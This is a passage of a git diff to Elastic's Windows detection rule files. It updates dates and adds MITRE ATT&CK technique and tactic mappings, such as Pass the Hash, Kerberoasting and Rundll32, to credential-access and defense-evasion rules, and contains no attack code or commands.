ATT&CK" + [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" +[[rule.threat.technique.subtechnique]] +id = "T1557.001" +name = "LLMNR/NBT-NS Poisoning and SMB Relay" +reference = "https://attack.mitre.org/techniques/T1557/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.002" name = "Pass the Hash" reference = "https://attack.mitre.org/techniques/T1550/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_posh_veeam_sql.toml b/rules/windows/credential_access_posh_veeam_sql.toml index fa457a50f0f..320d82c2d40 100644 --- a/rules/windows/credential_access_posh_veeam_sql.toml +++ b/rules/windows/credential_access_posh_veeam_sql.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/14" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -140,6 +140,7 @@ event.category:process and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" @@ -150,30 +151,41 @@ id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/credential_access_rare_webdav_destination.toml b/rules/windows/credential_access_rare_webdav_destination.toml index 89cddbac06b..41ab73ef4d4 100644 --- a/rules/windows/credential_access_rare_webdav_destination.toml +++ b/rules/windows/credential_access_rare_webdav_destination.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/28" integration = ["endpoint", "system", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/01/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,14 +87,31 @@ from logs-endpoint.events.process-*, logs-windows.sysmon_operational-*, logs-sys [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1187" name = "Forced Authentication" reference = "https://attack.mitre.org/techniques/T1187/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_regback_sam_security_hives.toml b/rules/windows/credential_access_regback_sam_security_hives.toml index 45500f46a21..711ea036359 100644 --- a/rules/windows/credential_access_regback_sam_security_hives.toml +++ b/rules/windows/credential_access_regback_sam_security_hives.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/01" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,10 +79,12 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" @@ -93,7 +95,10 @@ id = "T1003.004" name = "LSA Secrets" reference = "https://attack.mitre.org/techniques/T1003/004/" - +[[rule.threat.technique.subtechnique]] +id = "T1003.005" +name = "Cached Domain Credentials" +reference = "https://attack.mitre.org/techniques/T1003/005/" [rule.threat.tactic] id = "TA0006" diff --git a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml index bb46707c121..0f9a4002862 100644 --- a/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml +++ b/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml @@ -2,7 +2,7 @@ creation_date = "2022/04/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,31 +100,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1187" +name = "Forced Authentication" +reference = "https://attack.mitre.org/techniques/T1187/" + [[rule.threat.technique]] id = "T1212" name = "Exploitation for Credential Access" reference = "https://attack.mitre.org/techniques/T1212/" +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/credential_access_shadow_credentials.toml b/rules/windows/credential_access_shadow_credentials.toml index f2acb0609bf..a3571a46176 100644 --- a/rules/windows/credential_access_shadow_credentials.toml +++ b/rules/windows/credential_access_shadow_credentials.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,14 +107,26 @@ event.code:"5136" and host.os.type:"windows" and winlog.event_data.AttributeLDAP [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_spn_attribute_modified.toml b/rules/windows/credential_access_spn_attribute_modified.toml index f7b5e02f1bd..676de53b1b4 100644 --- a/rules/windows/credential_access_spn_attribute_modified.toml +++ b/rules/windows/credential_access_spn_attribute_modified.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/22" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,19 +106,31 @@ event.code:5136 and host.os.type:"windows" and winlog.event_data.OperationType:" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [[rule.threat.technique.subtechnique]] id = "T1558.003" name = "Kerberoasting" reference = "https://attack.mitre.org/techniques/T1558/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/credential_access_suspicious_comsvcs_imageload.toml b/rules/windows/credential_access_suspicious_comsvcs_imageload.toml index a1e9768b415..dc5054e536e 100644 --- a/rules/windows/credential_access_suspicious_comsvcs_imageload.toml +++ b/rules/windows/credential_access_suspicious_comsvcs_imageload.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/17" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -137,36 +137,46 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.001" name = "LSASS Memory" reference = "https://attack.mitre.org/techniques/T1003/001/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.003" +name = "Rename Legitimate Utilities" +reference = "https://attack.mitre.org/techniques/T1036/003/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml index e63eabdab29..5fb6a32c581 100644 --- a/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml +++ b/rules/windows/credential_access_suspicious_winreg_access_via_sebackup_priv.toml @@ -2,7 +2,7 @@ creation_date = "2022/02/16" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,10 +108,12 @@ sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan= [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" @@ -122,22 +124,25 @@ id = "T1003.004" name = "LSA Secrets" reference = "https://attack.mitre.org/techniques/T1003/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml index a019bfa0a69..b8650e2ef45 100644 --- a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml +++ b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/12/25" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] @@ -124,10 +124,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" + [[rule.threat.technique.subtechnique]] id = "T1003.002" name = "Security Account Manager" @@ -138,10 +140,20 @@ id = "T1003.003" name = "NTDS" reference = "https://attack.mitre.org/techniques/T1003/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/credential_access_veeam_commands.toml b/rules/windows/credential_access_veeam_commands.toml index 26d95dd353c..2895e6e80bd 100644 --- a/rules/windows/credential_access_veeam_commands.toml +++ b/rules/windows/credential_access_veeam_commands.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/14" integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,6 +94,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" @@ -104,26 +105,38 @@ id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/windows/credential_access_web_config_file_access.toml b/rules/windows/credential_access_web_config_file_access.toml index e8bd3d77a6c..e3ea0ffc993 100644 --- a/rules/windows/credential_access_web_config_file_access.toml +++ b/rules/windows/credential_access_web_config_file_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,18 +79,39 @@ event.category:file and host.os.type:windows and event.action:open and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["process.executable", "user.id"] diff --git a/rules/windows/credential_access_wireless_creds_dumping.toml b/rules/windows/credential_access_wireless_creds_dumping.toml index fb71341678b..7c94a74678b 100644 --- a/rules/windows/credential_access_wireless_creds_dumping.toml +++ b/rules/windows/credential_access_wireless_creds_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/01" integration = ["endpoint", "system", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -123,31 +123,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/defense_evasion_amsi_bypass_powershell.toml b/rules/windows/defense_evasion_amsi_bypass_powershell.toml index f239ebb7b8f..61813c4a8b0 100644 --- a/rules/windows/defense_evasion_amsi_bypass_powershell.toml +++ b/rules/windows/defense_evasion_amsi_bypass_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -132,39 +132,49 @@ event.category:"process" and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_clearing_windows_event_logs.toml b/rules/windows/defense_evasion_clearing_windows_event_logs.toml index c2f04f5a873..50a42f7e78f 100644 --- a/rules/windows/defense_evasion_clearing_windows_event_logs.toml +++ b/rules/windows/defense_evasion_clearing_windows_event_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -98,24 +98,28 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.001" name = "Clear Windows Event Logs" reference = "https://attack.mitre.org/techniques/T1070/001/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml b/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml index bbf8c289d02..aa828899622 100644 --- a/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml +++ b/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -237,10 +237,12 @@ Communication apps like Slack, WebEx, and Teams are integral to modern workflows [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -251,27 +253,38 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1554" name = "Compromise Host Software Binary" reference = "https://attack.mitre.org/techniques/T1554/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_create_mod_root_certificate.toml b/rules/windows/defense_evasion_create_mod_root_certificate.toml index 3560277bb09..514692fc051 100644 --- a/rules/windows/defense_evasion_create_mod_root_certificate.toml +++ b/rules/windows/defense_evasion_create_mod_root_certificate.toml @@ -2,7 +2,7 @@ creation_date = "2021/02/01" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -154,19 +154,31 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" reference = "https://attack.mitre.org/techniques/T1553/" + [[rule.threat.technique.subtechnique]] id = "T1553.004" name = "Install Root Certificate" reference = "https://attack.mitre.org/techniques/T1553/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1557" +name = "Adversary-in-the-Middle" +reference = "https://attack.mitre.org/techniques/T1557/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/windows/defense_evasion_disable_nla.toml b/rules/windows/defense_evasion_disable_nla.toml index a3daa0e4c83..e808563bae7 100644 --- a/rules/windows/defense_evasion_disable_nla.toml +++ b/rules/windows/defense_evasion_disable_nla.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/25" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -92,6 +92,7 @@ registry where host.os.type == "windows" and event.action != "deletion" and regi [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" @@ -102,9 +103,30 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.010" +name = "Downgrade Attack" +reference = "https://attack.mitre.org/techniques/T1562/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml index e6b5d148708..8efcca4ce4a 100644 --- a/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml +++ b/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -90,36 +90,76 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.004" name = "Compile After Delivery" reference = "https://attack.mitre.org/techniques/T1027/004/" +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml b/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml index e9ad302d9ee..0ac8e7710fa 100644 --- a/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml +++ b/rules/windows/defense_evasion_enable_inbound_rdp_with_netsh.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,19 +91,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.004" name = "Disable or Modify System Firewall" reference = "https://attack.mitre.org/techniques/T1562/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml index 2cc57b1fcb1..23c029f86a1 100644 --- a/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml +++ b/rules/windows/defense_evasion_execution_lolbas_wuauclt.toml @@ -2,7 +2,7 @@ 